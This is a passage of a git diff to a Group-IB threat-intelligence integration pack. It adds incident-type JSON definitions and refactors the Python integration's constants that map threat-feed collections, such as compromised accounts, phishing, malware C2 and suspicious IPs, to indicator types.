"reputationCalc": 1, + "reputationCalc": 0, "system": false, "version": -1, "weeks": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json new file mode 100644 index 000000000000..11314b208f96 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_OSI_Vulnerability.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#7D28A7", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB OSI Vulnerability", + "layout": "GIB OSI Vulnerability Layout", + "locked": false, + "name": "GIB OSI Vulnerability", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json new file mode 100644 index 000000000000..6e7108fadb70 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Open_Proxy.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#69A536", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Suspicious IP Open Proxy", + "layout": "GIB Suspicious IP Open Proxy Layout", + "locked": false, + "name": "GIB Suspicious IP Open Proxy", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json new file mode 100644 index 000000000000..a3fa20be0ac6 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Scanner.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Suspicious IP Scanner", + "layout": "GIB Suspicious IP Scanner Layout", + "locked": false, + "name": "GIB Suspicious IP Scanner", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json new file mode 100644 index 000000000000..36d99028b73a --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_Socks_Proxy.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#7D3D63", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Suspicious IP Socks Proxy", + "layout": "GIB Suspicious IP Socks Proxy Layout", + "locked": false, + "name": "GIB Suspicious IP Socks Proxy", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json new file mode 100644 index 000000000000..e0472eb49823 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_TOR_Node.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#7A7A7A", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Suspicious IP TOR Node", + "layout": "GIB Suspicious IP TOR Node Layout", + "locked": false, + "name": "GIB Suspicious IP TOR Node", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json new file mode 100644 index 000000000000..df9a0eaf04a5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Suspicious_IP_VPN.json @@ -0,0 +1,34 @@ +{ + "autorun": false, + "color": "#AA00FF", + "days": 0, + "daysR": 0, + "default": false, + "detached": false, + "disabled": false, + "extractSettings": { + "fieldCliNameToExtractSettings": { + "gibrelatedindicatorsdata": { + "extractAsIsIndicatorTypeId": "", + "extractIndicatorTypesIDs": [], + "isExtractingAllIndicatorTypes": true + } + }, + "mode": "Specific" + }, + "hours": 0, + "hoursR": 0, + "id": "GIB Suspicious IP VPN", + "layout": "GIB Suspicious IP VPN Layout", + "locked": false, + "name": "GIB Suspicious IP VPN", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", + "readonly": false, + "reputationCalc": 0, + "system": false, + "version": -1, + "weeks": 0, + "weeksR": 0, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json index 906eea67ba82..7052bed73cda 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Targeted_Malware.json @@ -22,10 +22,10 @@ "layout": "GIB Targeted Malware Layout", "locked": false, "name": "GIB Targeted Malware", - "onChangeRepAlg": 2, - "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution", + "onChangeRepAlg": 0, + "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution", "readonly": false, - "reputationCalc": 2, + "reputationCalc": 0, "system": false, "version": -1, "weeks": 0, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json index e42dd45a03ae..05d6e9f44d81 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Admiralty_Code.json @@ -7,7 +7,6 @@ "Email", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, @@ -35,4 +34,4 @@ "useAsKpi": false, "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json index 337a23cead05..efbff3947c5d 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Collection.json @@ -7,7 +7,6 @@ "Email", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json index 2cb663a4befb..5917d42eac7d 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Credibility.json @@ -7,7 +7,6 @@ "Email", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, @@ -35,4 +34,4 @@ "useAsKpi": false, "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json new file mode 100644 index 000000000000..ecc522f9d88c --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Hash.json @@ -0,0 +1,30 @@ +{ + "associatedToAll": true, + "caseInsensitive": true, + "cliName": "gibhash", + "closeForm": false, + "content": true, + "editForm": true, + "group": 2, + "hidden": false, + "id": "indicator_gibhash", + "isReadOnly": false, + "locked": false, + "name": "GIB Hash", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": true, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json index 8eaa56794718..77a7d78b9164 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_ID.json @@ -7,7 +7,6 @@ "Email", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, @@ -15,7 +14,7 @@ "cliName": "gibid", "closeForm": false, "content": true, - "description": "ID of event in GIB TI&A", + "description": "ID of event in GIB TI\u0026A", "editForm": true, "group": 2, "hidden": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json index d6a74c0ffc41..bc912699d399 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Malware_Name.json @@ -4,7 +4,6 @@ "URL", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json index dd7470d41c7a..a58c047494be 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Proxy_Anonymous.json @@ -1,5 +1,5 @@ { - "associatedTypes": [ + "associatedTypes": [ "IP" ], "associatedToAll": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json index 424ca24ea650..4826ab67cdf6 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Reliability.json @@ -7,7 +7,6 @@ "Email", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, @@ -35,4 +34,4 @@ "useAsKpi": false, "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json index adf82d196306..0242874c1fb5 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Severity.json @@ -7,7 +7,6 @@ "Email", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, @@ -34,4 +33,4 @@ "useAsKpi": false, "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json index 04cf02a49c08..1042e7664d1c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_ID.json @@ -5,7 +5,6 @@ "URL", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json index fd82575e5c2c..3249a1b43755 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_Name.json @@ -5,7 +5,6 @@ "URL", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json index f1a11c332b8e..b5a2f4d6f84c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorFields/indicatorfield-GIB_Threat_Actor_is_APT.json @@ -5,7 +5,6 @@ "URL", "Domain", "GIB Compromised Mule", - "GIB Compromised IMEI", "GIB Victim IP" ], "associatedToAll": false, diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json index c1a151f8abe7..7122b39b91e2 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_IMEI.json @@ -12,4 +12,4 @@ "updateAfter": 0, "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json index 513bae42626d..133f9ce13d94 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Compromised_Mule.json @@ -12,4 +12,4 @@ "updateAfter": 0, "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json index 79724411e445..29916158e612 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IndicatorTypes/reputation-GIB_Victim_IP.json @@ -12,4 +12,4 @@ "updateAfter": 0, "version": -1, "fromVersion": "6.0.0" -} +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py index bea7edd8a263..b473f1b68337 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA.py @@ -1,436 +1,1397 @@ - import demistomock as demisto from CommonServerPython import * from CommonServerUserPython import * + """ IMPORTS """ -import json -from datetime import datetime, timedelta -from collections.abc import Generator -import dateparser -import urllib3 -import random -from requests.auth import HTTPBasicAuth +from json import dumps as json_dumps +from datetime import datetime + +from dateparser import parse as dateparser_parse +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +from cyberintegrations import TIPoller +from traceback import format_exc +import re +from enum import Enum # Disable insecure warnings -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) +urllib3_disable_warnings(InsecureRequestWarning) + """ CONSTANTS """ DATE_FORMAT = "%Y-%m-%dT%H:%M:%SZ" -MAPPING: dict = { + +INDICATORS_TYPES = { "compromised/account_group": { - "date": - "dateFirstSeen", - "name": - "login", - "prefix": - "Compromised Account", - "indicators": - [ - { - "main_field": "events.cnc.url", "main_field_type": "URL" - }, - { - "main_field": "events.cnc.domain", "main_field_type": "Domain" - }, - { - "main_field": "events.cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["events.cnc.ipv4.asn", "events.cnc.ipv4.countryName", "events.cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - }, - { - "main_field": "events.client.ipv4.ip", - } - ] + "types": { + "event_url": "URL", + "event_domain": "Domain", + "events_ipv4_ip": "IP", + }, + "add_fields_types": { + "event_url": {}, + "event_domain": {}, + "events_ipv4_ip": { + "asn": "asn", + "country_name": "geocountry", + "region": "geolocation", + } + }, }, - "compromised/card": { - "date": - "dateDetected", - "name": - "cardInfo.number", - "prefix": - "Compromised Card", - "indicators": - [ - { - "main_field": "cnc.url", "main_field_type": "URL" - }, - { - "main_field": "cnc.domain", "main_field_type": "Domain" - }, - { - "main_field": "cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] + "compromised/bank_card_group": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, }, - "compromised/breached": { - "date": - "uploadTime", - "name": - "email", - "prefix": - "Data Breach", - "indicators": [] + "compromised/mule": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, }, - "bp/phishing": { - "date": - "dateDetected", - "name": - "phishingDomain.domain", - "prefix": - "Phishing", - "indicators": - [ - { - "main_field": "url", "main_field_type": "URL" - }, - { - "main_field": "phishingDomain.domain", "main_field_type": "Domain", - "add_fields": ["phishingDomain.registrar"], - "add_fields_types": ["registrarname"] - }, - { - "main_field": "ipv4.ip", "main_field_type": "IP" - } - ] + "compromised/card": { + "types": { + "cnc_url": "URL", + "cnc_domain": "Domain", + "cnc_ipv4_ip": "IP", + }, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, }, - "bp/phishing_kit": { - "date": - "dateDetected", - "name": - "hash", - "prefix": - "Phishing Kit", - "indicators": - [ - { - "main_field": "emails", "main_field_type": "Email" - } - ] + "osi/vulnerability": { + "types": { + "id": "CVE", + }, + "markdowns": { + "software_mixed": ( + "| Software Name | Software Type | Software Version |\n" + "| ------------- | ------------- | ---------------- |\n" + ) + }, + "add_fields_types": { + "id": { + "cvss_score": "cvss", + "description": "description", + "software_mixed": "gibsoftwaremixed", + "dateLastSeen": "cvemodified", + "datePublished": "published", + "severity": "severity", + } + }, }, - # "bp/domain": { - # "date": - # "ts_create", - # "name": - # "attrs.domain", - # "prefix": - # "Phishing Domain", - # "indicators": - # [ - # { - # "main_field": "attrs.domain", "main_field_type": "Domain", - # "add_fields": ["phishingDomain.registrar"], - # "add_fields_types": ["registrarname"] - # }, - # { - # "main_field": "attrs.server_ip", "main_field_type": "IP", - # "add_fields": ["attrs.server_ip_asn", "attrs.server_ip_country_name", "attrs.server_ip_region"], - # "add_fields_types": ["asn", "geocountry", "geolocation"] - # } - # ] - # }, "osi/git_repository": { - "date": - "dateDetected", - "name": - "name", - "prefix": - "Git Leak", + "types": { + "contributors_emails": "Email", + "hash": "GIB Hash", + }, + "add_fields_types": { + "contributors_emails": {}, + "hash": {} + }, }, - "osi/public_leak": { - "date": - "created", - "name": - "hash", - "prefix": - "Public Leak", + "attacks/phishing_kit": {"types": {"emails": "Email"}, "add_fields_types": {"emails": {}}}, + "attacks/phishing_group": { + "types": { + "url": "URL", + "phishing_domain_domain": "Domain", + "ipv4_ip": "IP", + }, + "add_fields_types": { + "url": {}, + "phishing_domain_domain": {"phishing_domain_registrar": "registrarname"}, + "ipv4_ip": { + "ipv4_country_name": "geocountry", + }, + }, }, - "malware/targeted_malware": { - "date": - "date", - "name": - "injectMd5", - "prefix": - "Targeted Malware", - "indicators": - [ - { - "main_field": "md5", "main_field_type": "File", - "add_fields": ["fileName", "md5", "sha1", "sha256", "size"], - "add_fields_types": ["gibfilename", "md5", "sha1", "sha256", "size"] - } - ] + "attacks/deface": { + "types": {"url": "URL", "target_domain": "Domain", "target_ip_ip": "IP"}, + "add_fields_types": { + "url": {}, + "target_domain": {}, + "target_ip_ip": { + "target_ip_asn": "asn", + "target_ip_country_name": "geocountry", + "target_ip_region": "geolocation", + } + }, + }, + "attacks/ddos": { + "types": {"cnc_url": "URL", "cnc_domain": "Domain", "cnc_ipv4_ip": "IP"}, + "add_fields_types": { + "cnc_url": {}, + "cnc_domain": {}, + "cnc_ipv4_ip": { + "cnc_ipv4_asn": "asn", + "cnc_ipv4_country_name": "geocountry", + "cnc_ipv4_region": "geolocation", + } + }, + }, + "malware/cnc": { + "types": { + "url": "URL", + "domain": "Domain", + }, + "add_fields_types": { + "url": {}, + "domain": { + "ipv4_ip": "IP", + "ipv4_asn": "asn", + "country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, + }, + "suspicious_ip/socks_proxy": { + "types": {"ipv4_ip": "IP"}, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, }, + "suspicious_ip/open_proxy": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, + }, + "suspicious_ip/tor_node": { + "types": {"ipv4_ip": "IP"}, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + } + }, + }, + "suspicious_ip/vpn": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + }, + }, + }, + "suspicious_ip/scanner": { + "types": { + "ipv4_ip": "IP", + }, + "add_fields_types": { + "ipv4_ip": { + "ipv4_asn": "asn", + "ipv4_country_name": "geocountry", + "ipv4_region": "geolocation", + }, + }, + }, + "hi/threat": { + "types": { + "ipv4": "IP", + "domain": "Domain", + "url": "URL", + "hashes_md5": "File", + }, + "add_fields_types": { + "ipv4": {}, + "domain": {}, + "url": {}, + "hashes_md5": { + "name": "gibfilename", + "hashes_md5": "md5", + "hashes_sha1": "sha1", + "hashes_sha256": "sha256", + "size": "size", + } + }, + }, + "apt/threat": { + "types": { + "ipv4": "IP", + "domain": "Domain", + "url": "URL", + "hashes_md5": "File", + }, + "add_fields_types": { + "ipv4": {}, + "domain": {}, + "url": {}, + "hashes_md5": { + "name": "gibfilename", + "hashes_md5": "md5", + "hashes_sha1": "sha1", + "hashes_sha256": "sha256", + "size": "size", + } + }, + }, +} +PREFIXES = { + "compromised/account_group": "Compromised Account Group", + "compromised/bank_card_group": "Compromised Card Group", + "compromised/breached": "Data Breach", + "compromised/mule": "Compromised Mule", + "osi/git_repository": "Git Leak", + "osi/public_leak": "Public Leak", + "osi/vulnerability": "OSI Vulnerability", + "attacks/ddos": "Attacks DDoS", + "attacks/deface": "Attacks Deface", + "attacks/phishing_group": "Phishing Group", + "attacks/phishing_kit": "Phishing Kit", + "apt/threat": "Nation-State Cybercriminals Threat Report", + "apt/threat_actor": "Nation-State Cybercriminals Threat Actor Profile", + "hi/threat": "GIB Cybercriminal Threat Report", + "hi/threat_actor": "GIB Cybercriminal Threat Actor Profile", + "suspicious_ip/tor_node": "Suspicious IP Tor Node", + "suspicious_ip/open_proxy": "Suspicious IP Open Proxy", + "suspicious_ip/socks_proxy": "Suspicious IP Socks Proxy", + "suspicious_ip/vpn": "Suspicious IP VPN", + "suspicious_ip/scanner": "Suspicious IP Scanner", + "malware/cnc": "Malware CNC", + "malware/malware": "Malware", +} - "compromised/mule": { - "name": - "account", - "prefix": - "Compromised Mule", - "indicators": - [ - { - "main_field": "cnc.url", "main_field_type": "URL", - }, - { - "main_field": "cnc.domain", "main_field_type": "Domain", - }, - { - "main_field": "cnc.ipv4.ip", "main_field_type": "IP", - "add_fields": ["cnc.ipv4.asn", "cnc.ipv4.countryName", "cnc.ipv4.region"], - "add_fields_types": ["asn", "geocountry", "geolocation"] - } - ] +INCIDENT_CREATED_DATES_MAPPING = { + "compromised/account_group": "dateFirstSeen", + "compromised/breached": "uploadTime", + "compromised/mule": ["dateAdd", "dateIncident"], + "compromised/bank_card_group": "dateFirstCompromised", + "osi/git_repository": "dateDetected", + "osi/public_leak": "created", + "osi/vulnerability": "datePublished", + "attacks/ddos": "dateReg", + "attacks/deface": "date", + "attacks/phishing_kit": "dateFirstSeen", + "attacks/phishing_group": ["detected", "updated"], + "apt/threat": "createdAt", + "apt/threat_actor": "createdAt", + "hi/threat": "createdAt", + 